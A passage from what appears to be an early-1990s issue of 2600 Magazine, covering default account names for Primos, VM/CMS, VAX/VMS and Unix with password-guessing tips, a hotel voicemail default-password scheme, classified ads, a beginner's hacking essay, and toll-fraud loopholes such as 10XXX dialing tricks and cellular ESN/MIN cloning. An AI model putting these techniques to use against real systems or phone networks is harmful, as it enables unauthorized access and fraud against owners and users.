  2082. data, they probably will never know that you have been there.
  2083.  
  2084.                     Common Accounts for the Primos System
  2085.     Prime
  2086.     Admin
  2087.     Games
  2088.     Test
  2089.     Tools
  2090.     System
  2091.     Rje
  2092.     Guest
  2093.     Netman
  2094.     Cmdnco
  2095.     Primos
  2096.     Demo
  2097.     Regist
  2098.     Prirun
  2099.     Telenet
  2100.  
  2101.                       Common Accounts for the VM/CMS System
  2102.     Operator
  2103.     Cmsbatch1
  2104.     Autolog1
  2105.     Operatns
  2106.     Vmtest
  2107.     Vmutil
  2108.     Maint
  2109.     Smart
  2110.     Vtam
  2111.     Erep
  2112.     Rscs
  2113.     Cms
  2114.     Sna
  2115.  
  2116.                     Common Accounts for the VAX/VMS System
  2117.     Vax
  2118.     Vms
  2119.     Dcl
  2120.     Demo
  2121.     Test
  2122.     Help
  2123.     News
  2124.     Guest
  2125.     Decnet
  2126.     Systest
  2127.     Uetp
  2128.     Default
  2129.     User
  2130.     Field
  2131.     Service
  2132.     System
  2133.     Manager
  2134.     Operator
  2135.  
  2136.                   Common Accounts for the Unix System
  2137.     root
  2138.     uucp
  2139.     nuucp
  2140.     daemon
  2141.     who
  2142.     guest
  2143.     io
  2144.     com
  2145.     bin
  2146.     sys
  2147.     informix
  2148.     uucpmgr
  2149.     adm
  2150.     profile
  2151.     trouble
  2152.     intro
  2153.     rje
  2154.     hello
  2155.     Ip
  2156.     setup
  2157.     powerdown
  2158.     uname
  2159.     makefsys
  2160.     mountfsys
  2161.     checkfsys
  2162.     umountfsys
  2163.  
  2164.     This should give you an idea on where to start.
  2165.  
  2166.                             Combinations
  2167.     The combinations to get into a system are nearly infinite. If the password
  2168. needed to get into the system is something like "FRM;UN!DA" then the chances
  2169. are extremely remote that you will get in. Multiply the following: the number
  2170. of tries where you use the username as the password by the variations of a
  2171. word (i.e. for "CMSBATCH" passwords could be "Batch" or "BATCHCMS"). Now add
  2172. on names and wild guesses. This should give you quite a list. All you can do
  2173. is exhaust your list of username/password combinations and move on. You have
  2174. done your best as far as trial and error hacking is concerned. Trashing for
  2175. printouts is also an option.
  2176.  
  2177.     Druidic Death at one time surveyed a VM/CMS system's unencrypted password
  2178. file and wrote the results down as categories. This is a list of his findings:
  2179.  
  2180.     Total number of system users: 157
  2181.     Total number of accounts that can't be logged into: 37
  2182.     Total number of passwords that are a form of the account name: 10
  2183.     Total number of passwords that are the same as the account's name: 3
  2184.     Total number of passwords that are a related word to the account name: 10
  2185.     Total number of passwords that are first names, not the user's own: 17
  2186.     Total number of passwords that are the user's first name: 19
  2187.     Total number of passwords that are words related to the user's job: 7
  2188.     Total number of passwords that are the name of the company: 1
  2189.     Total number of random character passwords: 1
  2190.     Total number of passwords that are, in some format, calendar dates: 32
  2191.     Total number of passwords that were unchanged defaults: 7
  2192.  
  2193.     This should give you an idea of how things are placed in a major corporate
  2194. computer.
  2195.                                Imagination
  2196.     This is what you need to gain access to an account. Being a number cruncher
  2197. just won't do it anymore. In the following segment, I will list out ideas with
  2198. about 20 or 30 examples in each. This article will get you going. You just have
  2199. to finish the job.
  2200.  
  2201.                          Common First and Last Names
  2202.     These can readily be obtainable out of the telephone book, the greatest
  2203. source of all first and last names. Examples:
  2204.     Gus
  2205.     Dave
  2206.     Chris
  2207.     Michele
  2208.     Jessica
  2209.     Arthur
  2210.     Robert
  2211.     Patrick
  2212.     Arnold
  2213.     Benjamin
  2214.     Derek
  2215.     Eddie
  2216.     Shannon
  2217.     Richard
  2218.     Ross
  2219.     Keith
  2220.     William
  2221.     Bubba
  2222.     Mickey
  2223.     Clyde
  2224.                                  Colors
  2225.     Figure it out for yourself, everything is possible. Examples:
  2226.     Blue
  2227.     Black
  2228.     Orange
  2229.     Red
  2230.     Yellow
  2231.     Purple
  2232.     Magenta
  2233.     Green
  2234.  
  2235.                                 The Dictionary
  2236.     The single most important document. Everyone should have one, and if you
  2237. do not have one get one. Many passwords are at your disposal. And, by all
  2238. means when on a Unix, download/usr/dict/words, the online dictionary. I also
  2239. believe that you should not limit your words to just the English versions.
  2240. There is no reason why passwords cannot be in Spanish, French, etc.
  2241.  
  2242.                               Types of Cars
  2243.     Pontiac
  2244.     Ford
  2245.     Chevy
  2246.     Buick
  2247.     Toyota
  2248.     Honda
  2249.     Ferrari
  2250.     Porsche
  2251.  
  2252. Motorcycles and all venue of transportation can be included in this segment.
  2253.  
  2254.                                 Rock Bands
  2255.     Zeppelin
  2256.     Pink floyd
  2257.     Hendrix
  2258.     REM
  2259.     Cream
  2260.     Ozzy
  2261.     Gunsroses
  2262.     Mozart
  2263.     Publicenemy
  2264.     Etc.
  2265.  
  2266.     This section can include magazines, software, profanities (when I was
  2267. validation sysop on Digital Logic's Data Service I don't know how many people
  2268. used the word FUCK when asking for validation). You should have accumulated
  2269. quite a list by now.
  2270.  
  2271.                             Conclusion:
  2272.     This is it. I hope you have learned that nothing should be put past the
  2273. system manager. He is the only person between you and a system that could be
  2274. an excellent source of information. Enjoy!
  2275.  
  2276.   References
  2277.     Look at the following articles for in-depth information for specific
  2278.     operating systems:
  2279.     "Unix From the Ground Up" by The Prophet. Unbelievably helpful in learning
  2280.     Unix.
  2281.     Lex Luthor's "Hacking VAX/VMS". 2600 Magazine, February 1986.
  2282.     "A Guide to the Primos Operating System" by Carrier Culprit. LOD/H
  2283.     Technical Journal
  2284.     "Hacking IBM's VM/CMS Operating System" by Lex Luthor. 2600 Magazine,
  2285.     November and December 1987.
  2286.  
  2287.  
  2288.  
  2289.       ------------------------------------------------------------------
  2290.  
  2291.  
  2292.                      HOW TO USE THE DIAL TELEPHONE
  2293.  
  2294.         (Yet another internal phone company document!  This one we're
  2295.     reprinting in it's entirety on the next two pages, as a public service.)
  2296.  
  2297.     You will find the dial telephone easy to operate and the service it
  2298. provides fast and dependable. The information in the will be helpful to you in
  2299. obtaining the utmost satisfaction and convenience in the use of dial service.
  2300.    New York Telephone Company
  2301.         ***
  2302.  
  2303.                        Listening for Dial Tone
  2304.     On all calls, remove the receiver from the hook and listen for dial tone
  2305. before starting to dial. Dial tone is a steady humming sound in the receiver
  2306. indicating that the line is ready for you to dial.
  2307.  
  2308.            Calls to Central Offices Which You Should Dial Direct
  2309. (Central offices which you should dial direct from your telephone are shown on
  2310. the card furnished to you.)
  2311.  
  2312.     When you hear dial tone, keep the receiver off the hook and dial the first
  2313. two letters of the central office name, the office numeral, then each figure
  2314. of the line number.
  2315.  
  2316.  For example, if dialing WOrth 2-9970 -
  2317.     (1) Place your finger in the opening in the dial over the letter W.
  2318.     (2) Pull the dial around until you strike the finger stop.
  2319.     (3) Remove your finger from the opening, and without touching the dial
  2320.     allow it to return to its normal position.
  2321.     (4) Proceed in the same way to dial the letter 0 and the figures 2-9-9-7
  2322.     and 0. If the number called has a party line letter, dial the number in
  2323.     the same way, followed by the letter at the end of the number.
  2324.  
  2325.     Within a few seconds after you have completed dialing, you should hear
  2326. either the ringing signal, an intermittent burr-rr-ing sound, or the busy
  2327. signal, a rapid buzz-buzz-buzz.
  2328.  
  2329.     If you hear an interrupted buzzing sound, as buzz-buzz -- buzz-buzz, it
  2330. indicates that you have dialed the central office designation incorrectly.
  2331. Hang up the receiver, wait a few seconds, and make another attempt, being
  2332. careful to dial the central office designation correctly.
  2333.  
  2334.     If you do not hear any signal within half a minute, hang up the receiver,
  2335. wait a few seconds and make another attempt.
  2336.  
  2337.     When, for any reason, you do not obtain a connection (for example, the
  2338. called line is busy or does not answer), you will get quicker service if you
  2339. hang up the receiver and try the call again yourself at intervals instead of
  2340. immediately calling the operator for assistance. No charge is made unless you
  2341. obtain an answer from a subscriber's telephone.
  2342.  
  2343.     If you make a mistake while dialing, hang up the receiver at once, wait a
  2344. few seconds, and make another attempt.
  2345.  
  2346.     Before starting to dial a second call, always hang up your receiver for a
  2347. few seconds.
  2348.  
  2349.                   Obtaining Assistance from the Operator
  2350.     If you have trouble in dialing, or if you have occasion to report cases of
  2351. service irregularities, you can reach the operator by placing your finger in
  2352. the opening in the dial over the word "OPERATOR" and then pulling the dial
  2353. around until you strike the finger stop.
  2354.  
  2355.     After connection has once been established with the operator, you may
  2356. recall her by moving your receiver hook up and down slowly. This can be done
  2357. only when you are connected with the operator; on other calls, moving the
  2358. receiver hook will break the connection.
  2359.  
  2360.        Calls from a Party Line or from a Line with an Extension Telephone
  2361.     Always make sure that the line is not in use. If you do not hear the dial
  2362. tone, inquire if the line is being held by some other person. If no response
  2363. is received, hang up the receiver for a few seconds and make another attempt.
  2364.  
  2365.     Listen on the line while dialing, and if you hear another party come in on
  2366. the line or hear successive clicks in the receiver, it indicates that someone
  2367. else on your line is trying to call. Inform him that the line is in use and
  2368. request him to hang up his receiver. When he does so, hang up your own
  2369. receiver for a few seconds, and then remove it and dial the complete number
  2370. again.
  2371.  
  2372.     To call another party on your line, dial the operator, give her the number
  2373. you wish to call, state that it is the number of another party on your line,
  2374. and give her your number.
  2375.  
  2376.     To call an extension telephone on your line, dial the operator, give her
  2377. your number and ask her to ring the extension telephone.
  2378.  
  2379.       Calls by Number to Central Offices  Which You Can Not Dial Direct
  2380.     To place calls by number to central offices within New York City which
  2381. you can not dial direct, or to central offices at nearby points, dial the
  2382. operator and give her the number of the telephone with which you desire to be
  2383. connected, and also the number of the telephone from which you are calling.
  2384. For example --   "Bayside 9-5570 -- Walker 5-9970"
  2385.  
  2386.     If the central office you are calling is not at a nearby point, give the
  2387. operator the name of the city, the name of the state, if desirable, the number
  2388. of the telephone wilh which you desfie to be connected, and also the number of
  2389. the telephone from which you are calling. For example --
  2390.     "Philadelphia, Market 1234 -- Walker 5 -9970"
  2391.  or
  2392.     "Portland, Maine, Preble 1234 -- Walker 5-9970"
  2393.  
  2394.                   Out-of-Town Calls to Particular Persons
  2395.     To make out-of-town calls to particular persons, dial the figures 2-1-1
  2396. and give the operator who answers the name of the person with whom you wish to
  2397. speak, the name of the city, the name of the state, the number of the
  2398. telephone with which you desire to be connected, and also the number of the
  2399. telephone from which you are calling. For example --
  2400.     "Mr.  Paul  Smith  at  Boston. Massachusetts, Main 3340 -- Walker 5- 9970"
  2401.  
  2402.                             Information Calls
  2403. Telephone numbers of subscribers not listed in your directory, and telephone
  2404. numbers of subscribers at out-of-town points may be obtained by calling
  2405. Information.
  2406.     To call Information, dial the figures 4-1-1.
  2407.  
  2408.                                Telegrams
  2409.     To send a telegram, look up the telephone number of the desired telegraph
  2410. company in the directory, and dial this number as you would any other.
  2411.  
  2412.                       Calls to the Telephone Company
  2413.  Repair Service....Dial the figures 6-1-1
  2414.  Business Office...Dial the figures 8-1-1
  2415.  Time of Day  .......  Dial MEridian 7-1212
  2416.  
  2417.                            Emergency Calls
  2418.                      (Police, Fire, Ambulance)
  2419.     Dial the operator, give her your number and say --
  2420.  "I want a policeman."
  2421.  "I want to report a fire."
  2422.  "I want an ambulance."
  2423.  
  2424.     If compelled to leave the telephone before the desired station answers,
  2425. tell the operator where help is required.
  2426.  
  2427.     You may also reach the Police and the Fire Departments directly by dialing
  2428. the numbers listed in the directory.
  2429.  
  2430.                           Dial Coin Telephones
  2431.     The operation of dial coin telephones is quite similar to that of your own
  2432. dial telephone. The only differences are that it is necessary to deposit a
  2433. coin in order to obtain dial tone (indicating that the line is ready for you
  2434. to dial) and that telegrams are sent by dialing the operator and telling her
  2435. the telegraph company desired. If the called line is busy or does not answer,
  2436. the coin will be returned after the receiver is hung up.
  2437.  
  2438.  
  2439.  
  2440.       ------------------------------------------------------------------
  2441.  
  2442.  
  2443.                               Meridian Mail
  2444.     We are pleased to introduce Meridian Mail, a telephone answering system
  2445. designed to provide guests with the best possible message service.
  2446.  
  2447.     When you are unable to answer calls to your room, Meridian Mail answers
  2448. them for you.  Callers are informed that you are not available.  Messages
  2449. can be left for you automatically, in detail, in any language, and in
  2450. complete confidentiality.
  2451.  
  2452.     Your messages are stored in your personal "Voice Mailbox", to be retrieved
  2453. directly by you.  Unless you choose to delete them, messages remain in your
  2454. voice mailbox until you check out.
  2455.  
  2456.                        To Hear Your Messages
  2457.     From your room
  2458.         The light on your telephone will flash when you have a new message.
  2459.  
  2460.         To retrieve your messages:
  2461.             Lift the handset and press MESSAGE KEY.
  2462.  
  2463.         Reviewing the messages in your mailbox:
  2464.             To move to the previous message, press 4.
  2465.             To move to the next message, press 6.
  2466.  
  2467.         Listening to your messages:
  2468.             To play, press 2.
  2469.             To continue playback, press 2 again.
  2470.             To step forward, press 3.  This allows you to skip quickly
  2471.             through a long message.
  2472.             To step backward, press1.  This allows you to review a portion
  2473.             of the message.
  2474.  
  2475.     To get help
  2476.         If you have trouble while accessing your mailbox, Meridian Mail
  2477.         automatically prompts you with the helpful instructions.
  2478.  
  2479.         If you need more help:
  2480.             Press * any time while you are using Meridian Mail.
  2481.  
  2482.         If you would rather speak to an attendant:
  2483.             From inside the Hotel, dial 0.
  2484.             From outside the hotel, dial 484-1000.
  2485.  
  2486.     From outside your room
  2487.         You can retrieve messages while away from your room.
  2488.             From inside the hotel, dial 4434, from outside the hotel, dial
  2489.             646-4434 or 484-1000.
  2490.             Enter your room number and press #
  2491.             Enter your password and press #
  2492.  
  2493.     Using a rotary phone
  2494.         When using a rotary phone, you can only listen to your messages.  You
  2495.         need a touch-tone phone to use any special commands.
  2496.             From inside the hotel, dial 0
  2497.             From outside the hotel, dial 202-484-1000
  2498.             Give the attendant your name, room number, and password
  2499.  
  2500.     "Other mail"
  2501.         If you have other messages at the front desk, Meridian Mail informs
  2502.         you that you have "other mail".
  2503.         To retrieve your other mail
  2504.             Press 0.
  2505.  
  2506.     Your Password
  2507.         When you check in, your password is initially set to the first four
  2508.         digits of your last name.  For example:
  2509.             Last Name          Password
  2510.              Smith              Smit
  2511.              Jones              Jone
  2512.  
  2513.         Contact the front desk if you need more information on passwords.
  2514.  
  2515.  
  2516. (Computer hackers at the CFP conference in Washington DC this spring found it
  2517. astoundingly easy to get into guests' mailbox. All you need is a name and a room
  2518. number! We wonder how many other hotels are so trusting.)
  2519.  
  2520.  
  2521.  
  2522.       ------------------------------------------------------------------
  2523.  
  2524.  
  2525.                            2600 Marketplace
  2526.  
  2527. 2600 meetings: New York City: First friday of the month at the Citicorp
  2528. Center--from 5 to 8 pm in the lobby near the payphones, 153 E 53rd St.,
  2529. between Lexington and 3rd Avenues. Come by, drop off articles, ask questions,
  2530. find the undercover agents. Call 516-751-2600 for more info. Payphone numbers:
  2531. 212-223-9011, 212-223-8927, 212-308-8044, 212-308-8162.  Washington DC: In
  2532. the Pentagon City mall from 5 to 8 pm on the first Friday of the month. San
  2533. Francisco: At 4 Embarcadero Plaza (inside) from 5 to 8 pm on the first Friday
  2534. of the month. Payphone numbers: 415-398-9803,4,5,6. Los Angeles: At tbe Union
  2535. Station, corner of Macy St. and Alameda from 5 to 8 pm, first Friday of the
  2536. month. Inside main entrance by bank of phones. Payphone numbers: 213-972-
  2537. 9358, 9388, 9506, 9519, 9520; 213-625-9923, 9924; 213-614-9849, 9872, 9918,
  2538. 9926. Chicago: Century Mall, 2828 Clark St., 5 pm to 8 pm, first Friday of the
  2539. month, lower level, by the payphones. St. Louis: At the Galleria, Highway 40
  2540. and Brentwood, 5 pm to 8 pm, first Friday of the month, lower level, food
  2541. court area, by the theaters. Philedelphea: 6 pm at the 30th Street Amtmk
  2542. station at 30th & Market, under the "Stairwell 7" sign. Payphone numbers: 215-
  2543. 222- 9880,9881,9779,9799,9632, and 387-9751. For info, call 215-552-8826.
  2544. Cambridge, MA: 6 pm at Harvard Square, outside the "Au Bon Pain" bakery store.
  2545. If it's freezing, then inside "The Garage" by the Pizza Pad on the second
  2546. floor. Call 516-751-2600 to start a meeting In your city. 
  2547.  
  2548. TOP QUALITY computer virus info. Little Black Book of Computer Viruses $14.95,
  2549. add $2.50 postage. Disassemblies of popular viruses, fully commented and fully
  2550. explained. Write for list. American Eagle Publications, Box 41401, Tucson, AZ
  2551. 85717. 
  2552.  
  2553. ARRESTED  DEVELOPMENT.   H/P/A/V. +31.79.426079. Renegade 8-10 UUCP DOMAINS!
  2554. Virnet Node, PGP Areas, 386-33mhz, 300mb, USR DS 38k4.
  2555.  
  2556. LOOKING FOR ANYONE and everyone wanting to trade ideas, Amiga files, info
  2557. about "interesting" things. I have about 10 megs of text files, ALWAYS looking
  2558. for more! Contact Steve at 414-422-1067 or cmail rlippen@csd4.csd.uwm.edu
  2559.  
  2560. WE CAME, WE SAW, WE CONQUERED. 11"x 17" full color poster of pirate flag
  2561. flying in front of AT&T facility. Send $6 to P.O. Box 771071, Wichita, KS
  2562. 67277-1072. 
  2563.  
  2564. PHONES TAPPED, office/home bugged, spouse cheating. Then this catalogue is for
  2565. you! Specialized equipment, items, and sources. It's time to get even.
  2566. Surveillance, countermeasures. espionage, personal protection. Send $5 check
  2567. or money order to B.B.I., PO Box 978, Dept. 2-6, Shoreham, NY 11786. 
  2568.  
  2569. TAP BACK ISSUES, complete set Vol. 1-91 of QUALITY copies from originals.
  2570. Includes schematics and indexes.  $100 postpaid.  Via UPS or 1st Class Mail.
  2571. Copy of 1971 Esquire article The Secrets of the Little Blue Box" $5 & large
  2572. SASE w/52 cents of stamps. Pete G., PO Box 463, Mr. Laurol, NJ 08054. We are
  2573. the Original!
  2574.  
  2575. PRINT YOUR ZIP CODE IN BARCODE. A great label program that allows you to use a
  2576. database of address to print label with barcode. You also type and print a
  2577. custom label. Send $9 no check to: H. Kindel, 5662 Calle Real Suite 171,
  2578. Goleta, CA 93117. IBM only. 
  2579.  
  2580. GENUINE 6.5536 MHZ CRYSTALS only $5.00 each. Orders shipped postpaid via First
  2581. Class Mail. Send payment with name and address to Electronic Design Systems,
  2582. 144 West Eagle Road, Suite 108, Havenown, PA 19083. Also: information wanted
  2583. on Northeast Electronics Corp's TTS-59A portable MF sender and TTS-2762R MF
  2584. and loop signalling display. Need manuals, schematics, alignment and
  2585. calibration instructions (or photocopies). Will reward finder. 
  2586.  
  2587. WIRELESS MICROPHONE and wireless telephone transmitter kits. Featured in the
  2588. WINTER 1991-92 2600. Complete kit of paris with PC board. $20 CASH ONI.Y, or $
  2589. 35 for both (no checks). DEMON DIALER K/T as reviewed in this issue of 2600.
  2590. Designed and developed in Holland. Produces ALL voiceband signals used in
  2591. worldwide telecommunications networks. Send $250 CASH ONLY (DM 350) to
  2592. Hack-Tic Technologies, Postbus 22953, 1100 DL Amsterdam, Netherlands (allow up
  2593. to 12 weeks for delivery). Please call +31 20 6001480 * 144,. Absolutely no
  2594. checks accepted!
  2595.  
  2596. FORMER U.S. ARMY ELECTRONIC WARFARE TECHNICIAN with TS clearance looking for
  2597. surveillance work which requires cunning, ingenuity, and skill. Prolocks of
  2598. Atlantic City, Box 1769, Atlantic City, NJ 08404.
  2599. TIN SHACK BBS (818) 992-3321. The BBS where hackers abound! Over a gig of
  2600. files, many on-line games! Multi-line! 2600 Magazine readers get FREE elite
  2601. access!
  2602.  
  2603. WOULD LIKE TO TRADE IDEAS with and befriend any fellow 2600 readers.  Call Mike
  2604. at 414-458-6561 if interested.
  2605.  
  2606.             *******************************************************
  2607.             *****                                             *****
  2608.             *****   Marketplace ads are FREE to subscribers   *****
  2609.             *****                                             *****
  2610.             *******************************************************
  2611.  
  2612.  
  2613.  
  2614.       ------------------------------------------------------------------
  2615.  
  2616.  
  2617.                              getting started
  2618.                              by Phord Prefect
  2619.  
  2620.     So you watched something on TV and it was about hackers... you said
  2621. "nifty"  ....  You read something on a BBS about free phone calling... you
  2622. said "cool"  ....  You started checking out books from the library about
  2623. Knight Lightning, or maybe even blue boxing (Esquire, October 1971 )... you
  2624. said "wow"  ....  You got this magazine and said, "I have to do this" but
  2625. didn't know where to start.
  2626.  
  2627. Well, you're not alone  ....
  2628.  
  2629.     Your curiosity overwhelms you, but yet you can't seem to find that little
  2630. thing to start your exploration. You could try looking around for other
  2631. hackers, but if they have a lick of sense they won't make it too obvious. Try
  2632. looking harder, they might just come to you.
  2633.  
  2634.     So this doesn't work... you just can't seem to find any, or they're
  2635. mostly pirates and can't help you. Well, you're just going to have to get the
  2636. balls to do something illegal in your life (but I'm not forcing you), so do
  2637. something. This magazine is full of examples. Sure there's stealing MCI
  2638. calling cards, building blue, red, or whatever boxes, but there are much
  2639. deeper things. If you defraud the phone company, you're not a hacker, you just
  2640. get free phone calls. You need a passion for the system. You need a
  2641. willingness to learn a lot about the system before you do something.
  2642.  
  2643.     If you're looking for free phone calls, hurry up and do that and stop
  2644. wasting your time. Like I said, you're not a hacker, you just are bothered and
  2645. need a little trick to get onto BBS's in some distant place.
  2646.  
  2647.     If you have a curiosity for the system, then you're in the right place.
  2648. The phone company is something so amazingly huge that one could probably spend
  2649. a lifetime exploring it.  This "exploring" is what 2600 is all about. I know
  2650. that you computer genius teenagers don't need manuals for things (like
  2651. computer programs and VCR's) and are really impatient, so you don't want the
  2652. bullshit. You want to know how to get into systems now. Well, relax. You made
  2653. a good decision buying this mag, but you have to learn first. You need  to
  2654. know this thing backwards and forwards or else you'll screw up and get caught.
  2655.  
  2656.     So, in response to the beginners writing in and wanting to "know how to
  2657. get free phone calls and other phone tricks", you need to get knowledge. Read
  2658. everything you can get your hands on and when you feel the time is right,
  2659. after you know exactly how, where, why, and when to do it, do it.
  2660.  
  2661.  
  2662.  
  2663.       ------------------------------------------------------------------
  2664.  
  2665.  
  2666.                      Restricted Data Transmissions
  2667.  
  2668.     Toll fraud is a serious problem that plagues the telecommunications
  2669. industry. Recently l have acquired a collection of trashed documents detailing
  2670. what AT&T and Bellcore are doing to stop these "thefts."l found these papers
  2671. very enlightening and occasionally humorous. A few insights into what's
  2672. bugging the telco.
  2673.  
  2674.     Toll Fraud Prevention Committee (TFPC): This is an industry-wide "forum"
  2675. committee set up in conjunction with Bellcore that deals with, guess what,
  2676. toll fraud. The TFPC has "super elite" meetings every once in awhile. All
  2677. participants are required to sign non-disclosure agreements.  Fortunately,
  2678. the participants frequently toss their notes in the POTC (Plain Old Trash
  2679. Can -- see. I can make stupid acronyms just like Bellcore!). As far as I'm
  2680. concerned, once it's in the POTC, it's PD (public domain)!
  2681.  
  2682.     The "open issues" concerning the TFPC currently are Third Number
  2683. Billing Fraud, International Incoming Collect Calls to Payphones, and Incoming
  2684. Collect Calls to Cellular. Apparently, they have noticed a marked increase in
  2685. third number billing fraud in California. To quote a memo, "The most prevalent
  2686. fraud scams include originating from coin/copt (aka COCOTs) phones as well as
  2687. business and residence service that is fraudulently established."  Third
  2688. party billing from COCOTs is an old trick. Another type of COCOT abuse
  2689. discussed 10XXX (where XXX is the code for a certain LD carrier), the caller
  2690. on the COCOT gets to choose their LD carrier. However, in some cases
  2691. the LEC (Local Exchange Carrier) strips off the 10XXX and then sends the call
  2692. to the lXC (Inter-Exchange Carrier, the guys that place the LD call) as a 1 +
  2693. directly dialed call. So, when you dial 10XXX+O11+international number, the
  2694. LEC strips the 10XXX and the IXC sees the call as directly dialed
  2695. international and assumes the call has been paid for by coin into the COCOT.
  2696. Dialing 10XXX+1+ACN also sometimes works for LD calls within the United
  2697. States. Anyway, COCOT providers are wigging out a bit because, while they must
  2698. provide 10XXX+O service, they want to block the 10XXX+1 and 10XXX+011
  2699. loopholes, but LEC's have chosen to provide COCOTs with a standard business
  2700. line which is not capable of distinguishing between these different
  2701. situations, which is why central offices have been typically programmed to
  2702. block all types of 10XXX calls from COCOTs. Thanks to the FCC, they can't do
  2703. that anymore; it's breaking the law.  So COs have been reprogrammed into
  2704. accepting these 10XXX calls from all COCOTs, and the burden of selectively
  2705. blocking the 10XXX+1 and 10XXX+011 loopholes often  falls  upon  the  COCOT
  2706. manufacturer. They gotta build lt into the COCOT hardware itself!
  2707.  
  2708.     Well, many early COCOTs cannot selectively unblock 10XXX+O, so their
  2709. owners face a grim choice between ignoring the unblocking law (thereby facing
  2710. legal problems), unblocking all 10XXX  calls  (thereby  opening themselves up
  2711. to massive fraud), or replacing their COCOTs with expensive, more
  2712. sophisticated models. Other LECs have begun offering call screening and other
  2713. methods to stop this type of fraud, but the whole situation is still pretty
  2714. messy.  By the way, for a comprehensive list of 10XXX carrier access codes,
  2715. see the Autumn 1989 issue of 2600, page 42 and 43. While they are constantly
  2716. changing, most of these should still be good.
  2717.  
  2718.     Incoming international Collect to Cellular: according to the notes when
  2719. a cellular phone is turned on, it 'checks in' with the local cellular office.
  2720. When this happens, a device that 'reads' radio waves can capture the
  2721. identification of the cellular phone. A tremendous volume of 'cloned'
  2722. fraudulent cellular calls are going to Lebanon." Same old trick, grabbing the
  2723. cell phone's ESN/MIN as it's broadcast. The only twist is that you call
  2724. someone's cellular phone collect in order to get them to pick up and broadcast
  2725. their ESN/MIN (they will probably refuse the call, but they will have
  2726. broadcast their ESN/MIN nevertheless!) But why Lebanon?
  2727.  
  2728.     The American Public Communications Council mentioned "a desire for the
  2729. TFPC to be involved in the resolution of clip-on fraud." Maybe you guys should
  2730. try better shielding of the phone line coming out the back of the COCOT??
  2731. Apparently, clip-on fraud has really taken off with the recent flux of new
  2732. COCOTs. COCOTs operate off a plain old customer loop, so clipping onto the
  2733. ring and tip outside the body of the COCOT works nicely. That is, assuming you
  2734. can get at the cables and get through the insulation.
  2735.  
  2736.     Incoming International Collect: This is a big issue. A person from overseas
  2737. calls a payphone collect in the United States. His/her buddy answers the
  2738. payphone and says, "Sure, l accept the charges." Believe it or not, this trick
  2739. works many times! Here's why. In the United  States, databases containing
  2740. all public telephone numbers provide a reasonable measure of control over
  2741. domestic collect abuse and are available to all carriers for a per-use charge.
  2742. These databases are offered and maintained by the local telephone companies
  2743. (LTC). Domestic collect-to-coin calling works well, because most operator
  2744. services systems in the United States query this database on each domestic
  2745. collect call. Most Local Exchange Carriers in the United States also offer
  2746. this database service to owners of COCOTs (for those few that accept incoming
  2747. calls).
  2748.  
  2749.     However, international operators across the world do not share access to
  2750. this database, just as United States international operators do not have
  2751. database access overseas! The CCITT, the international consortium of
  2752. telecommunications carriers, recognized this serious problem many years ago
  2753. with its strong recommendation to utilize a standardized coin phone
  2754. recognition tone (commonly called the cuckoo tone) on every public telephone
  2755. line number. Such a tone would be easily recognized by operators worldwide,
  2756. and is currently in use by many foreign telcos.
  2757.  
  2758.     The United States decided to ignore this logically sound recommendation,
  2759. having already employed a numbering strategy for public telephones which,
  2760. together with a reference document called the "Route Bulletin", alerted
  2761. foreign operators that the called number should be checked for coin with the
  2762. United States inward operator. This simple procedure greatly reduced the
  2763. number of times that the foreign operator had to check with the United States
  2764. operator, yet was effective at controlling abuse. Everyone slept soundly.
  2765.  
  2766.     But after the bust-up of AT&T in 1984, the local telephone companies,
  2767. operating independently and under pressure to offer new services (cellular,
  2768. pagers, etc.), abandoned the public phone fixed numbering strategy! In
  2769. addition, in June of 1984 the FCC decided to allow the birth of private
  2770. payphones (COCOTs). And, up until 1989, nothing was done to replace the fraud
  2771. prevention system. Can you say "open season"?
  2772.  
  2773.     In 1989, the TFPC began seeking a solution to the growing volume of
  2774. fraudulent collect calls resulting from this void in the fraud prevention
  2775. architecture. Numerous solutions were explored. A primary solution was chosen.
  2776.  
  2777.     Validation database! Yes, the TFPC chose to support 100 percent the LEC
  2778. database solution, with the cuckoo payphone recognition tone as one of a
  2779. number of secondary solutions. This decision caused problems, problems,
  2780. problems, since it was evaluated that a great number of foreign telcos would
  2781. be unable to implement this database-checking routine (for a variety of
  2782. technical reasons). Furthermore, because this TFPC "solution" to the United
  2783. States' problem is not in conformance with international requirements, the
  2784. foreign telcos view it with strong opposition as an unacceptable solution due
  2785. to the additional worktime that would be incurred and the blatant unwillingness
  2786. on the part of the United States to follow an effective and longstanding
  2787. international standard (shit, we balked at using metrics, why not this too?).
  2788.  
  2789.     To this day, the TFPC is still bouncing around ideas for this. And the
  2790. susceptibility of United States payphones to intemational incoming collect
  2791. calls remains wide open. Various phone companies are currently fighting the
  2792. cuckoo tone system, because they are cheap mothers and dont want to spend the
  2793. estimated $500-700 per payphone to install the cuckoo tone technology. If the
  2794. cuckoo tone were implemented, it would virtually eliminate the problem of
  2795. international incoming collect calls. But it hasn't been  ....
  2796.  
  2797.     Other brilliant "secondary" solutions recommended by the TFTP are:
  2798.     1) Eliminate the ringer on the payphone.
  2799.     2) Route all such calls thru a United States operator.
  2800.     3) Eliminate incoming service to payphones altogether.
  2801.  
  2802.     And so on. As you can see, this is a fascinating story, and the latest TFTP
  2803. meeting ended with the note "The issue was discussed at some length with the
  2804. end result of it becoming a new issue." Truly the work of geniuses.
  2805.  
  2806.     In closing, I want to share with you a quote from an article I dug out from
  2807. a pile of coffee grinds. It's from Payphone Exchange Magazine.
  2808.  
  2809.     The fewer the number of people aware of a primary line of defense coming
  2810. down, the better. Any qualified person reading the hacker and underground
  2811. publications knows that many of their articles are written by current LTC and
  2812. IXC employees [or people like me who go through their garbage!]. Loose lips
  2813. sink ships. Unrestricted distribution of sensitive information permits fraud.
  2814. Both cost dearly. Let's stop them both today."
  2815.  
  2816.  All can say is... fuck that.
  2817.  
  2818. According to internal phone company documents that were sent to us,
  2819. "fraudulent collect ceiling is an issue that has plagued the telephone industry
  2820. for nearly as many years as the service has been available to the public." One
  2821. of the biggest problems is, admittedly, that the United States never
  2822. implemented the CCITT recommendation to have an internationally recognizable
  2823. tone sound when a payphone picks up an incoming call. Prior to 1984, the
  2824. United States had a numbering scheme. By using something called the Route
  2825. Bulletin, operators from other countries were able to tell if they should
  2826. check with the inward operator in the United States to see if the phone was .
  2827. payphone ('checking for coin'). This simple procedure greatly reduced the
  2828. number of times that the foreign operator had to check with the US operator.
  2829. yet was effective at controlling abuse.' A major problem now exists because
  2830. after divestiture, this numbering scheme wes abandoned. Added to this was the
  2831. introduction of COCOTs (private payphones). Confusion over the true status
  2832. of these phones and the growing number of these instruments caused the local
